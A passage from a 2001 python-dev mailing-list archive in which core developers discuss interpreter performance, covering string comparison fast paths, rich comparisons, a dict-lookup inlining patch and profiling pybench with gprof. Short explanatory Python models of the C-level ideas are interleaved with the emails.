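Here is a toy Python model of the dispatch order under discussion. It includes the existing int+int special case and the proposed str+str one. `binary_add` and its `stats` counter are hypothetical. The last branch merely stands in for the generic PyNumber_Add path rather than reproducing its coercion logic.

```python
from collections import Counter


def binary_add(v, w, stats):
    """Toy model of a BINARY_ADD with type-specific fast paths.

    `stats` counts which path each addition took.  The final branch stands
    in for the generic PyNumber_Add route, which (per the discussion) tries
    numeric coercion before falling back to sequence concatenation.
    """
    if type(v) is int and type(w) is int:
        stats["int"] += 1          # existing special case
        return v + w
    if type(v) is str and type(w) is str:
        stats["str"] += 1          # the proposed str+str special case
        return v + w
    stats["generic"] += 1
    return v + w


stats = Counter()
print(binary_add(1, 2, stats), binary_add("ab", "cd", stats), binary_add(1.5, 2, stats))  # 3 abcd 3.5
```

The design point is simply that an exact-type test for the common pair is cheap, and it lets string concatenation skip the numeric attempts entirely.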

> I also looked at SmallLists.  It seems that the only significant
> change since 1.5.2 is the garbage collection.  This test spends a lot
> more time deallocating lists than it used to, and the only change I
> see in the code is the GC.  I assume, but haven't checked, that the
> story is similar for SmallTuples.
> 
> So the primary things that have slowed down since 1.5.2 seem to be:
> comparisons, coercion, and memory management for containers.  These
> also seem to be the things that have improved the most in terms of
> features, completeness, etc.  Looks like we need to revisit them and
> sort out the performance issues.

Thanks for doing all this work, Jeremy!

I just hope that these performance hacks won't have to be redone when
I'm done with healing the types/class split.  I'm expecting that
things can become a lot simpler if everything inherits from Object,
sequences inherit from Sequence, and so on.  But since I'm currently
going slow on this work, I won't complain too much if the existing
code gets optimized first.  The stuff you already checked in looks
good!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From jeremy at digicool.com  Sat May 19 00:06:05 2001
From: jeremy at digicool.com (Jeremy Hylton)
Date: Fri, 18 May 2001 18:06:05 -0400 (EDT)
Subject: [Python-Dev] explanations for more pybench slowdowns
In-Reply-To: <200105182158.QAA01250@cj20424-a.reston1.va.home.com>
References: <200105182107.RAA16214@cliff.concentric.net>
	<200105182158.QAA01250@cj20424-a.reston1.va.home.com>
Message-ID: <15109.40141.757071.770265@slothrop.digicool.com>

In case anyone else is interested, here are two quick pointers on
running pybench tests under the profiler.

1. To build Python with profiling hooks (Unix only):

       LDFLAGS="-pg" OPT="-pg" configure
       make

   When you run that python, it produces a gmon.out file.  To run
   gprof, pass it the profile-enabled executable and gmon.out; it
   writes the results to stdout.

2. Use this handy script (below) to run a single pybench test under
   the profiler and produce the output.

Jeremy

"""Tool to automate profiling of individual pybench benchmarks"""

import os
import re
import tempfile

PYCVS = "/home/jeremy/src/python/dist/src/build-pg/python"
PY152 = "/home/jeremy/src/python/dist/Python-1.5.2/build-pg/python"

rx_grep = re.compile(r'^([^:]+):(.*)')
rx_decl = re.compile(r'class (\w+)\(\w+\):')

def find_bench(name):
    p = os.popen("grep %s *.py" % name)
    for line in p.readlines():
        mo = rx_grep.search(line)
        if mo is None:
            continue
        file, text = mo.group(1, 2)
        mo = rx_decl.search(text)
        if mo is None:
            continue
        klass = mo.group(1)
        return file, klass
    return None, None

def write_profile_code(file, klass, path):
    i = file.find(".")
    file = file[:i]
    f = open(path, 'w')
    print >> f, "import %s" % file
    print >> f, "%s.%s().run()" % (file, klass)
    f.close()

def profile(interp, path, result):
    if os.path.exists("gmon.out"):
        os.unlink("gmon.out")
    os.system("PYTHONPATH=. %s %s" % (interp, path))
    if not os.path.exists("gmon.out"):
        raise RuntimeError, "gmon.out not generated by %s" % interp
    os.system("gprof %s gmon.out > %s" % (interp, result))

def main(bench_name):
    file, klass = find_bench(bench_name)
    if file is None:
        raise ValueError, "could not find class %s" % bench_name

    code_path = tempfile.mktemp()
    write_profile_code(file, klass, code_path)

    profile(PYCVS, code_path, "%s.cvs.prof" % bench_name)
    profile(PY152, code_path, "%s.152.prof" % bench_name)

    os.unlink(code_path)

if __name__ == "__main__":
    import sys
    main(sys.argv[1])


From jim at interet.com  Sat May 19 18:45:15 2001
From: jim at interet.com (James C. Ahlstrom)
Date: Sat, 19 May 2001 12:45:15 -0400
Subject: [Python-Dev] [off topic] Python is taking over the world
Message-ID: <3B06A31B.67A8D010@interet.com>

I was in my local (Somerville, NJ) Borders book store
last week and noticed that they stocked many Python books,
most in multiple copies.  It all added up to three feet
of Python books.  Great.

The clincher was when I went to my YMCA, and saw that
someone had posted a flyer offering tutoring in Math,
Physics, Java and Python.

Congratulations to Guido and all on this list.

JimA


From guido at digicool.com  Sun May 20 01:18:25 2001
From: guido at digicool.com (Guido van Rossum)
Date: Sat, 19 May 2001 19:18:25 -0400
Subject: [Python-Dev] Off-topic: So long, and thanks for all the fish
Message-ID: <200105192318.TAA02405@cj20424-a.reston1.va.home.com>

For all you Douglas Adams fans out there:

    Douglas Noel Adams
       1952 - 2001

http://www.douglasadams.com

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one at home.com  Sun May 20 11:31:25 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 20 May 2001 05:31:25 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105170612.f4H6CI703034@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEFBKDAA.tim.one@home.com>

[Martin v. Loewis]
> ...
> If I set tp_richcompare of strings to 0, I get past this code, and do
>
> 		c = (*f)(v, w);
> 		if (PyErr_Occurred())

Note that the usual way to write this is

 		if (c < 0 && PyErr_Occurred())

More work for my artificial "ab" < "cd" case but a net win in real life (when
c >= 0, it's an internal error if PyErr_Occurred() were to return true; alas,
when c < 0 there's no way in the cmp protocol to use c's value alone to
distinguish between "less than" and "error").
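Here is a Python model of the convention Tim recommends. It uses a hypothetical `ErrorState` object in place of the interpreter's pending-exception state. A negative result can mean either "less than" or "error", so the error check is only needed when c < 0. The `checks` counter shows how many calls that saves.

```python
class ErrorState:
    """Hypothetical stand-in for the interpreter's pending-exception state."""

    def __init__(self):
        self.occurred = False
        self.checks = 0  # how many times a caller asked "is an error set?"

    def err_occurred(self):
        self.checks += 1
        return self.occurred


def checked_compare(compare, v, w, err):
    """Call a cmp-style function, consulting `err` only when c < 0.

    A negative result means either "less than" or "error", so only then
    can an exception be pending; returns None to signal a propagated error.
    """
    c = compare(v, w)
    if c < 0 and err.err_occurred():
        return None
    return c


def cmp3(a, b):
    return (a > b) - (a < b)


err = ErrorState()
print(checked_compare(cmp3, "cd", "ab", err), err.checks)  # 1 0
print(checked_compare(cmp3, "ab", "cd", err), err.checks)  # -1 1
```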

> 			return NULL;
> 		return convert_3way_to_object(op, c);
>
> Here, I get 3 function calls: f is string_compare, then
> PyErr_Occurred, finally convert_3way_to_object, which converts
> {-1,0,1} x Op -> {Py_True, Py_False}.

Unfortunately, it's 4 calls, as PyErr_Occurred() isn't a leaf.

> Indeed, when I inline convert_3way_to_object, I get the same speed in
> both cases (with the remaining differences attributed to measurement
> and gcc doing register usage differently in both functions).

OK, understood, and thanks for following up!
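The mapping Martin describes is trivial on its own. That fits his finding that the cost lay in the extra function call, not in the work done. Here is a Python model of it; the op names mirror Py_LT..Py_GE, and this is not the C source of convert_3way_to_object:

```python
import operator

# Each rich-comparison op becomes a test of the 3-way result c against 0.
_TESTS = {
    "LT": operator.lt,
    "LE": operator.le,
    "EQ": operator.eq,
    "NE": operator.ne,
    "GT": operator.gt,
    "GE": operator.ge,
}


def convert_3way_to_object(op, c):
    """Map a cmp()-style result c in {-1, 0, 1} and an op name to a bool."""
    return _TESTS[op](c, 0)


print(convert_3way_to_object("LT", -1), convert_3way_to_object("GE", -1))  # True False
```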

> I'd still be in favour of giving strings a richcompare, since it
> allows to optimize what I think is the single most frequent case:
> Py_EQ on strings.

In the absence of significant sorting, I agree Py_EQ is most frequent.

> With a control flow like
>
> 		if (a->ob_size != b->ob_size)
>                    goto False;
>
> 		if (a->ob_size == 0)
>                    goto True;
>
> 		if (a->ob_sval[0] != b->ob_sval[0])
>                    goto False;
>
> 		if(memcmp(a->ob_sval, b->ob_sval, a->ob_size))
>                    goto False;
>                 else
>                    goto True;
>
> we can reduce the number of function calls

Suggest collapsing the third into the first:

		if (a->ob_size != b->ob_size
                || a->ob_sval[0] != b->ob_sval[0])
                    goto False;

There's no danger of over-indexing when ob_size==0, because it doesn't
include the trailing null byte Python always sticks at the end of string
objects; and the first-byte check is much more likely to pay off than the
zero-length check (comparison to a null string?  gotta be rare as clear
conclusions <wink>), and better to test for the more common case first.
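Here is a Python sketch of the collapsed test. It models each string's storage as its bytes plus the trailing NUL Tim mentions, which is why index 0 is always readable. `string_eq` is a hypothetical name, and the final slice comparison stands in for memcmp:

```python
def string_eq(a: bytes, b: bytes) -> bool:
    """Equality with the two cheap rejections folded into one branch.

    Each operand is modelled as its bytes plus the trailing NUL byte, so
    index 0 exists even for empty strings (no over-indexing).
    """
    sa, sb = a + b"\0", b + b"\0"
    if len(a) != len(b) or sa[0] != sb[0]:
        return False
    # Same length and same first byte: compare the payload (memcmp stand-in).
    return sa[:len(a)] == sb[:len(b)]


print(string_eq(b"", b""), string_eq(b"spam", b"spat"), string_eq(b"ab", b"ba"))  # True False False
```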


From tim.one at home.com  Sun May 20 11:54:08 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 20 May 2001 05:54:08 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105170641.f4H6fFn03235@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEFBKDAA.tim.one@home.com>

[Tim]
>> 1. String objects are also equal despite being different objects,
>>    if their ob_sinterned pointers are equal and non-NULL.  So if
>>    you're looking for every trick in & out of the book, that's
>>    another one.

[Martin v. Loewis]
> That does not help. In the entire test suite, there are 0 instances
> where strings are compared which are not identical, but have equal
> ob_sinterned pointers.

Good to know.  Had you tried this a few weeks ago, there would have been
thousands (it so happened that one-character strings weren't being interned
*effectively*, and there were lots of 1-character cases then where #1
applied; that's been fixed; good to know more aren't popping up).

> ...
> Whether there's a fruitless branch depends on your compiler.

A branch instruction is a branch instruction; I didn't distinguish between
taken and non-taken branches, as there's no uniformity in codegen across
platforms.

> With gcc 3, you can write
>
> 	if (__builtin_expect(a == b, 0)) {
>
> and then the body of the if block will be moved out of the way of
> linear control flow.

I don't think we'll be littering Python with compiler-specific hacks.  It's
good to get the less common case out-of-line, but it's not a pure win:  while
it reduces the penalty when the test doesn't pay, it also reduces the benefit
when it does pay (by the wildly architecture-dependent cost of taking a
mispredicted out-of-line branch, and the wildly compiler-dependent costs of
how seriously they take their own decisions or user hints to out-of-line a
block (e.g., the compiler may refetch everything from memory again at the
target if it thinks it's truly rare)).

>> Any idea where those 800,000 virgin calls to oldcomp are coming
>> from?  That's a lot.

> As far as I could trace it, most of them come from lookdict_string (at
> various locations inside this function).

Ah!  Of course.  string_compare is hardwired into lookdict_string.  This case
may be important enough to merit a distinct _PyString_Equal function, with
just the stuff lookdict_string needs (e.g., there's never a gain in testing
for pointer equality when called from lookdict_string because the dict code
already checked that; but there may be a gain for that test in an all-purpose
string_richcompare).
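Here is a Python model of the split Tim proposes. The dict code does the identity check, and a string-only equality helper skips it; that helper stands in for the proposed `_PyString_Equal`. `entry_matches` and `string_equal` are hypothetical names. The caller supplies hash values, as a dict entry would cache them:

```python
def string_equal(a: bytes, b: bytes) -> bool:
    """Stand-in for a string-only equality helper used by the dict code.

    No identity test here: the caller has already done it.
    """
    return len(a) == len(b) and a == b


def entry_matches(entry_key, entry_hash, key, key_hash):
    """Key test for a string-only dict lookup, cheapest checks first."""
    if entry_key is key:          # identity check done once, by the dict code
        return True
    return entry_hash == key_hash and string_equal(entry_key, key)


k1 = b"spam"
k2 = bytes(bytearray(b"spam"))   # equal value, built as a separate object
print(entry_matches(k1, hash(k1), k2, hash(k2)))  # True
```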

> ...
> So to support sorting better, I should special-case Py_LT in
> string_richcompare also, to avoid the function call ?-)

Of course.  string_richcompare has to do a memcmp to resolve Py_EQ and Py_NE
anyway, and that's most of the work for resolving all 6 possibilities.  Get
rid of string_compare entirely!
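Here is a Python sketch of how one memcmp-style pass can answer all six comparisons. Py_EQ and Py_NE short-circuit on a length mismatch. The `memcmp` helper and the op-name strings are illustrative assumptions, not the C implementation:

```python
def memcmp(a: bytes, b: bytes, n: int) -> int:
    """Compare the first n bytes as unsigned values, returning -1, 0 or 1."""
    for x, y in zip(a[:n], b[:n]):
        if x != y:
            return -1 if x < y else 1
    return 0


def string_richcompare(a: bytes, b: bytes, op: str) -> bool:
    if op in ("EQ", "NE"):
        # Equality can reject on a length mismatch before touching the bytes.
        equal = len(a) == len(b) and memcmp(a, b, len(a)) == 0
        return equal if op == "EQ" else not equal
    # One memcmp over the common prefix, then length breaks ties.
    n = min(len(a), len(b))
    c = memcmp(a, b, n)
    if c == 0:
        c = (len(a) > len(b)) - (len(a) < len(b))
    return {"LT": c < 0, "LE": c <= 0, "GT": c > 0, "GE": c >= 0}[op]


print(string_richcompare(b"ab", b"cd", "LT"), string_richcompare(b"abc", b"ab", "GT"))  # True True
```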

[on cmp sloth]
> Yes, that is a serious problem. Fortunately, very few calls in my
> programs go to string_compare through cmp() now. But then, your
> programs are different, of course...

There are search-tree modules I have but didn't write that do this; I don't
care enough about them to frustrate Guido's grand vision <wink>.

It may be more important for sequences other than 8-bit strings, as each call
to a comparison function for a pair of non-string sequences is very expensive
(involving more layers of calls for each element comparison).


From tim.one at home.com  Sun May 20 12:13:14 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 20 May 2001 06:13:14 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105171405.JAA14836@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEFCKDAA.tim.one@home.com>

[Guido]
> I have always thought that eventually (but long before Py3K!) all
> objects would only support rich comparisons and the __cmp__ and
> tp_compare slots would become completely obsolete.

If the time machine batteries can hold a full charge, you may want to go back
and add Py_CMP as a seventh possible desired-operation argument to the rich
comparison API.  My experience with dict comparisons was that
dict_richcompare couldn't compute Py_LT/LE/GT/GE any cheaper than by doing a
full cmp, so I put the dict oldcmp back in order to avoid having dict richcmp
(potentially) compute cmp 3 times to fake one cmp.  But if dict richcmp knew
a cmp outcome was desired, it could compute it with no extra work to speak
of.  Then there would be no reason at all to hold on to the dict tp_compare
slot.
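This Python sketch shows where the factor of 3 comes from. It fakes a 3-way cmp using only a rich-comparison callback and records the calls it makes. `cmp_from_richcompare` and `counting_richcmp` are hypothetical. With a seventh CMP operation, as Tim suggests, one call would suffice:

```python
def cmp_from_richcompare(richcmp, a, b):
    """Fake a 3-way cmp with a boolean richcmp(a, b, op); up to 3 calls."""
    if richcmp(a, b, "EQ"):
        return 0
    if richcmp(a, b, "LT"):
        return -1
    if richcmp(a, b, "GT"):
        return 1
    raise ValueError("no ordering between the operands")


calls = []


def counting_richcmp(a, b, op):
    """Record each requested op; a dict-style richcmp might do a full
    comparison for every one of these calls."""
    calls.append(op)
    if op == "EQ":
        return a == b
    if op == "LT":
        return a < b
    return a > b


print(cmp_from_richcompare(counting_richcmp, 5, 3), calls)  # 1 ['EQ', 'LT', 'GT']
```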

The list and tuple richcmps are also doing almost all the work needed to
compute a 3-way cmp outcome.


From tim.one at home.com  Sun May 20 13:05:53 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 20 May 2001 07:05:53 -0400
Subject: [Python-Dev] Performance compares
In-Reply-To: <3B037D27.E258C363@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEFEKDAA.tim.one@home.com>

[M.-A. Lemburg]
> ...
> Running the same test for 2.1 vs. 2.0 there's not much to
> notice, so the important changes seem to be originating in
> the move from 1.5.2 to 2.0.

IIRC, Guido, Skip Montanaro and I put major effort into finding speedups for
1.5.2, and Fredrik did more independently (like inlining high-frequency int
operations in the eval loop).  Also IIRC, that's the last time any concerted
effort was put into speeding Python.  1.5.2 was an efficiency peak, then, and
unstable equilibrium never endures without deliberate and persistent
rebalancing work.  If Python were "a real product", it would be at least one
person's full-time job to keep it in peak shape.  But it's not even a
part-time job for anyone, and I don't see that changing.  In compensation,
machines have gotten faster much quicker than Python has slowed.


From mal at lemburg.com  Sun May 20 13:50:17 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Sun, 20 May 2001 13:50:17 +0200
Subject: [Python-Dev] Performance compares
References: <LNBBLJKPBEHFEDALKOLCOEFEKDAA.tim.one@home.com>
Message-ID: <3B07AF79.6EB42E54@lemburg.com>

Tim Peters wrote:
> 
> [M.-A. Lemburg]
> > ...
> > Running the same test for 2.1 vs. 2.0 there's not much to
> > notice, so the important changes seem to be originating in
> > the move from 1.5.2 to 2.0.
> 
> IIRC, Guido, Skip Montanaro and I put major effort into finding speedups for
> 1.5.2, and Fredrik did more independently (like inlining high-frequency int
> operations in the eval loop).  Also IIRC, that's the last time any concerted
> effort was put into speeding Python.  1.5.2 was an efficiency peak, then, and
> unstable equilibrium never endures without deliberate and persistent
> rebalancing work.  If Python were "a real product", it would be at least one
> person's full-time job to keep it in peak shape.  But it's not even a
> part-time job for anyone, and I don't see that changing.  In compensation,
> machines have gotten faster much quicker than Python has slowed.

How about making performance the main "feature" for 2.3 then ?!

2.0 - 2.2 introduced many new features in the interpreter core,
so I think it's time to stabilize those features and focus on
making Python regain the performance it had before those features
were introduced. At least to some of us, performance is an
issue and I think that there's a lot we can do to improve it.

One way to open up the field for better performance will be
to modularize the interpreter, so that new ways of optimization
can be explored, e.g. turning the VM into a register machine
(Skip once started looking into this with his Rattlesnake
patches) or creating specialized VMs which can then be used
by optimizing compilers as targets.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mwh at python.net  Sun May 20 13:52:40 2001
From: mwh at python.net (Michael Hudson)
Date: 20 May 2001 12:52:40 +0100
Subject: [Python-Dev] Comparison speed
In-Reply-To: "Tim Peters"'s message of "Sun, 20 May 2001 05:54:08 -0400"
References: <LNBBLJKPBEHFEDALKOLCMEFBKDAA.tim.one@home.com>
Message-ID: <m3u22gkzjr.fsf@atrus.jesus.cam.ac.uk>

"Tim Peters" <tim.one at home.com> writes:

> Ah!  Of course.  string_compare is hardwired into lookdict_string.
> This case may be important enough to merit a distinct
> _PyString_Equal function, with just the stuff lookdict_string needs

Or just inlining it all into lookdict_string, something like:

Index: Objects/dictobject.c
===================================================================
RCS file: /cvsroot/python/python/dist/src/Objects/dictobject.c,v
retrieving revision 2.90
diff -c -r2.90 dictobject.c
*** Objects/dictobject.c	2001/05/19 07:04:38	2.90
--- Objects/dictobject.c	2001/05/20 11:51:28
***************
*** 279,286 ****
  	register unsigned int mask = mp->ma_size-1;
  	dictentry *ep0 = mp->ma_table;
  	register dictentry *ep;
- 	cmpfunc compare = PyString_Type.tp_compare;
  
  	/* make sure this function doesn't have to handle non-string keys */
  	if (!PyString_Check(key)) {
  #ifdef SHOW_CONVERSION_COUNTS
--- 279,287 ----
  	register unsigned int mask = mp->ma_size-1;
  	dictentry *ep0 = mp->ma_table;
  	register dictentry *ep;
  
+ #define S(s) ((PyStringObject*)(s))
+ 
  	/* make sure this function doesn't have to handle non-string keys */
  	if (!PyString_Check(key)) {
  #ifdef SHOW_CONVERSION_COUNTS
***************
*** 299,305 ****
  		freeslot = ep;
  	else {
  		if (ep->me_hash == hash
! 		    && compare(ep->me_key, key) == 0) {
  			return ep;
  		}
  		freeslot = NULL;
--- 300,308 ----
  		freeslot = ep;
  	else {
  		if (ep->me_hash == hash
! 		    && S(ep->me_key)->ob_size == S(key)->ob_size
! 		    && memcmp(S(ep->me_key)->ob_sval,
! 			      S(key)->ob_sval,S(key)->ob_size) == 0) {
  			return ep;
  		}
  		freeslot = NULL;
***************
*** 318,324 ****
  		if (ep->me_key == key
  		    || (ep->me_hash == hash
  		        && ep->me_key != dummy
! 			&& compare(ep->me_key, key) == 0))
  			return ep;
  		else if (ep->me_key == dummy && freeslot == NULL)
  			freeslot = ep;
--- 321,329 ----
  		if (ep->me_key == key
  		    || (ep->me_hash == hash
  		        && ep->me_key != dummy
! 			&& S(ep->me_key)->ob_size == S(key)->ob_size
! 			&& memcmp(S(ep->me_key)->ob_sval,
! 				  S(key)->ob_sval,S(key)->ob_size) == 0))
  			return ep;
  		else if (ep->me_key == dummy && freeslot == NULL)
  			freeslot = ep;
***************
*** 327,332 ****
--- 332,339 ----
  		if (incr > mask)
  			incr ^= mp->ma_poly; /* clears the highest bit */
  	}
+ 
+ #undef S
  }
  
  /*

(apologies for the use of the preprocessor...).  I'll leave it to
someone else to work out if this is a win or not...
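
For readers who don't read C, here is a rough Python model of the key-equality test that the patch inlines into lookdict_string: identity first (as the second probe loop does), then the cached hash, then the length (ob_size), and only then a byte-wise compare standing in for memcmp(). The function name and the use of `bytes` keys are illustrative assumptions, not CPython code, and the dummy-slot check is left out.

```python
def string_key_matches(entry_key: bytes, entry_hash: int,
                       key: bytes, key_hash: int) -> bool:
    """Hypothetical model of the inlined string-key test in lookdict_string.

    Each check is cheaper than the next one, so most mismatches are
    rejected before any bytes are compared.
    """
    if entry_key is key:              # ep->me_key == key
        return True
    if entry_hash != key_hash:        # ep->me_hash == hash
        return False
    if len(entry_key) != len(key):    # S(ep->me_key)->ob_size == S(key)->ob_size
        return False
    return entry_key == key           # stands in for memcmp() on ob_sval
```

Whether this beats the indirect call through tp_compare is exactly the open measurement question.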

-- 
                    >> REVIEW OF THE YEAR, 2000 <<
                   It was shit. Give us another one.
                          -- NTK Know, 2000-12-29, http://www.ntk.net/


From tim.one at home.com  Sun May 20 14:57:11 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 20 May 2001 08:57:11 -0400
Subject: [Python-Dev] Performance compares
In-Reply-To: <3B07AF79.6EB42E54@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEFJKDAA.tim.one@home.com>

[MAL]
> How about making performance the main "feature" for 2.3 then ?!

Guido may be a dictator, but he doesn't have a magic wand -- "the main
feature" is what people volunteer to do and then fight for and then actually
do.

> 2.0 - 2.2 introduced many new features in the interpreter core,
> so I think it's time to stabilize those features and focus on
> making Python regain the performance it had before those features
> were introduced.  At least to some of us, performance is an
> issue and I think that there's a lot we can do to improve it.

"Performance" is meaningless unless quantified and made concrete:  what is it
that runs too slowly?  "Everything" is not a useful answer.  Speeding up
line-at-a-time input was an example of something that worked, via focus and
measurement and pushing ahead despite opposition.  I doubt any other approach
will bear fruit over such a short timeframe, and especially not without
resources to throw at it.

> One way to open up the field for better performance will be
> to modularize the interpreter, so that new ways of optimization
> can be explored, e.g. turning the VM into a register machine
> (Skip once started looking into this with his Rattlesnake
> patches) or creating specialized VMs which can then be used
> by optimizing compilers as targets.

Restructure the core for the benefit of optimizing compilers that don't
exist?  That sounds like an interesting research project, but not much to do
with making 2.3 faster.  In the meantime, modularization is more likely to
make the VM that does exist slower.

could-be-it's-easy-answers-or-none-ly y'rs  - tim


From tim.one at home.com  Sun May 20 14:58:09 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 20 May 2001 08:58:09 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <m3u22gkzjr.fsf@atrus.jesus.cam.ac.uk>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEFJKDAA.tim.one@home.com>

[Michael Hudson]
> ...
> (apologies for the use of the preprocessor...).  I'll leave it to
> someone else to work out if this is a win or not...

Umm, but that's the *hard* part.  I think even Guido knows how to do a string
compare inline <wink>.


From tim.one at home.com  Sun May 20 15:09:50 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 20 May 2001 09:09:50 -0400
Subject: [Python-Dev] explanations for more pybench slowdowns
In-Reply-To: <200105182107.RAA16214@cliff.concentric.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEFKKDAA.tim.one@home.com>

[Jeremy Hylton]
> ...
> The scary thing about BuiltinFunctionCalls is that the profiler shows
> it spending almost 30% of its time in PyArg_ParseTuple().  It
> certainly is a shame that we have this complicated, slow run-time
> parsing mechanism to deal with a static property of the code, namely
> how many arguments it takes and what their types are.

Special-casing the snot out of "O" looks like a winner <wink>:

  count     format %total  cumulative%
-------   -------- ------  -----------
1440897        'O'  47.45  47.45
 327694       'O!'  10.79  58.24
 285570      'O|i'   9.40  67.65
 262168     'O!|O'   8.63  76.28
 227405        'l'   7.49  83.77
 146537       's#'   4.83  88.60
  76779     'OO|O'   2.53  91.12
  65682      '|ss'   2.16  93.29
  48033       'OO'   1.58  94.87
  39879   'O|O&O&'   1.31  96.18

Those are the top 10 formats passed to PyArg_ParseTuple() during the test
suite, after stripping ";" and ":" decorations.
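
As a rough illustration of what special-casing "O" could mean, here is a toy Python model of a format-driven argument parser with a fast path that skips the format walk entirely when the format is exactly "O". It understands only "O", "l", "s" and "|", and all names are hypothetical; it is not the real PyArg_ParseTuple().

```python
def parse_tuple(args, fmt):
    """Toy model: return the parsed arguments as a tuple."""
    # Fast path for the most frequent format: exactly one object, any type.
    if fmt == "O":
        if len(args) != 1:
            raise TypeError("function takes exactly 1 argument (%d given)"
                            % len(args))
        return (args[0],)
    return _parse_general(args, fmt)

# Type checks for the few format codes this toy supports.
_CHECKS = {
    "O": lambda a: True,
    "l": lambda a: isinstance(a, int),
    "s": lambda a: isinstance(a, str),
}

def _parse_general(args, fmt):
    """Slow path: walk the format string one code at a time."""
    out = []
    optional = False
    i = 0
    for code in fmt:
        if code == "|":               # everything after "|" is optional
            optional = True
            continue
        if i >= len(args):
            if optional:
                break
            raise TypeError("not enough arguments")
        if not _CHECKS[code](args[i]):
            raise TypeError("argument %d has wrong type for %r" % (i + 1, code))
        out.append(args[i])
        i += 1
    if i < len(args):
        raise TypeError("too many arguments")
    return tuple(out)
```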

fast-paths-on-the-overtired-brain-ly y'rs  - tim


From aahz at rahul.net  Sun May 20 15:50:08 2001
From: aahz at rahul.net (Aahz Maruch)
Date: Sun, 20 May 2001 06:50:08 -0700 (PDT)
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCGEFCKDAA.tim.one@home.com> from "Tim Peters" at May 20, 2001 06:13:14 AM
Message-ID: <20010520135008.12ABE99C80@waltz.rahul.net>

Tim Peters wrote:
> 
> If the time machine batteries can hold a full charge, you may want
> to go back and add Py_CMP as a seventh possible desired-operation
> argument to the rich comparison API.  My experience with dict
> comparisons was that dict_richcompare couldn't compute Py_LT/LE/GT/GE
> any cheaper than by doing a full cmp, so I put the dict oldcmp back in
> order to avoid having dict richcmp (potentially) compute cmp 3 times
> to fake one cmp.  But if dict richcmp knew a cmp outcome was desired,
> it could compute it with no extra work to speak of.  Then there would
> be no reason at all to hold on to the dict tp_compare slot.
>
> The list and tuple richcmps are also doing almost all the work needed
> to compute a 3-way cmp outcome.

+1 from me; there's one spot in my new Decimal.py where I optimize an
expensive pair of equality tests down to one by using cmp(), and it's
likely that similar cases will pop up.  When I convert to C code, I'll
want to keep doing that.
-- 
                      --- Aahz (@pobox.com)

Hugs and backrubs -- I break Rule 6       <*>       http://www.rahul.net/aahz/
Androgynous poly kinky vanilla queer het Pythonista

I don't really mind a person having the last whine, but I do mind
someone else having the last self-righteous whine.


From martin at loewis.home.cs.tu-berlin.de  Sun May 20 15:48:43 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Sun, 20 May 2001 15:48:43 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
Message-ID: <200105201348.f4KDmh102375@mira.informatik.hu-berlin.de>

> string_compare() could special-case pointer equality too, although I suspect
> doing so would be a net loss.

I've done some measurements here, too, again taking your example

from time import clock

indices = [1] * 1000000

def doit():
    s = clock()
    for i in indices:
        "ab" < "ab"
    f = clock()
    return f - s

for i in xrange(10):
    print "%.3f" % doit()

This is the case where testing for identity helps. Running it without
identity test takes 0.74s, running it with identity test takes 0.68s.
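
time.clock() was removed in Python 3.8, so to rerun this kind of measurement today a sketch based on the timeit module (Python 3.6+ syntax) is more portable. It times `a < b` for one string object compared with itself and for two equal but distinct string objects; the absolute numbers, and the size of any difference, depend on the interpreter version and machine.

```python
import timeit

def best_time(a, b, number=200_000, repeat=5):
    """Best-of-`repeat` time, in seconds, for `number` evaluations of a < b."""
    timer = timeit.Timer("a < b", globals={"a": a, "b": b})
    return min(timer.repeat(repeat=repeat, number=number))

if __name__ == "__main__":
    same = "ab"
    other = "".join(["a", "b"])   # equal value, separate object in CPython
    print("identical objects: %.4f" % best_time(same, same))
    print("distinct objects:  %.4f" % best_time(same, other))
```

Taking the minimum of several repeats, rather than the mean, filters out most of the noise from other processes.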

Now, looking at the case of non-identical pointers, I could not find
any measurable difference. After increasing the number of rounds by a
factor of ten, I got, without identity test

6.920
6.920
6.910
6.970
7.080
6.920
6.920
6.910
6.930
6.920

With identity test, I got

6.930
6.930
6.920
7.080
6.920
6.930
6.960
6.930
6.920
6.920

That still does not look like a significant difference to me.

Regards,
Martin


From guido at digicool.com  Sun May 20 15:56:54 2001
From: guido at digicool.com (Guido van Rossum)
Date: Sun, 20 May 2001 09:56:54 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: Your message of "Sun, 20 May 2001 06:13:14 EDT."
             <LNBBLJKPBEHFEDALKOLCGEFCKDAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCGEFCKDAA.tim.one@home.com> 
Message-ID: <200105201356.JAA08372@cj20424-a.reston1.va.home.com>

> If the time machine batteries can hold a full charge, you may want to go back
> and add Py_CMP as a seventh possible desired-operation argument to the rich
> comparison API.

Funny, I was thinking about this too last night.

> My experience with dict comparisons was that dict_richcompare
